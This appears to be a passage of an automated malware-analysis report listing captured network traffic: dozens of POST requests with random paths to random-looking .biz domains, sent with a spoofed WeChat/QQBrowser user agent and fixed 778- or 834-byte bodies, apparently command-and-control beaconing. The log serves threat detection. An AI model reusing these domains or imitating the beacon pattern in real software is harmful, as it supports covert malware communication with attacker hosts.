                      Source: global trafficHTTP traffic detected: POST /fymfqakvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /dauxqowjtksae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /codtypdrb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /xurkvjsynkj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /mjdirtnxyxmmbdd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /qd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /lqbpdlmeudihjsyy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qaejwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xsynoi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /kxeknkvhxjifd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /jrbjefwrwpdia HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /odbjxuabwhunfmmt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /slpstmitttatqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /kwwcclrc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /mndfsbyfnglsm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ynekytqvwifwsqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /xkorvlthchk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /eaufcaidikag HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xev HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /bhaolncilxcwwbrc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xgntpyqjfcaulras HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /phrsxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /olaxecwr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /hb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /rejcysylgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /luiqxxselqgi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /gsd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ikgnytocxhbn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /sjbqcomcuhgq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /cetkmiomtp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qaurkicngfeyta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /rstn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /kafps HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /tfidpljjhw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /fqteasckvt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /bj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ahrycwbcmx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /hg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /suewswdbcoj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qjhbu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /lxqioayc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ryyevidfy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /dgyuecpahg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /wpvwjnrkggb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xgyfws HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /jgtblooqbwhrf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /gneaufgitjsgivk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /of HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qccuqoixlchlyacl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /qwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /spfkautpyscpm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /maknfkucqejsqyr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /vvlccgkwe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /moskhedrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /onpettusm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ongyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ohh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ppkkwetxneotu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /tthsijmbkytx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /boewdnuriy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ocbfkvtqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /fwoniptuhqdju HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /uwxvqmmhft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /kiomuyfeojupahpj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
